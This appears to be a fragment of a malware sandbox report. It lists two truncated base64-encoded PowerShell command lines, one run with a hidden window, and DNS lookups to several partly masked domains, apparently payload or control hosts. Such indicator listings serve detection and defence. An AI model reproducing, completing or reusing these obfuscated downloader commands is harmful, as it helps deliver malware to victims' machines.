Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABWAGsAZQBqAGIAZABoAG4AawA9ACcAWgB6AGsAegB2AGMAaABnAGkAJwA7ACQATQB1AHIAaQBiAHgAbABkAGkAcwAgAD0AIAAnAD...
- DNS ASK tr###ball.com
- DNS ASK bi####n-alex.com
- DNS ASK am###fun.com
- DNS ASK gi###ienweb.xyz
- DNS ASK gr####skiphotos.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABWAGsAZQBqAGIAZABoAG4AawA9ACcAWgB6AGsAegB2AGMAaABnAGkAJwA7ACQATQB1AHIAaQBiAHgAbABkAGkAcwAgAD0AIAAnAD...' (with hidden window)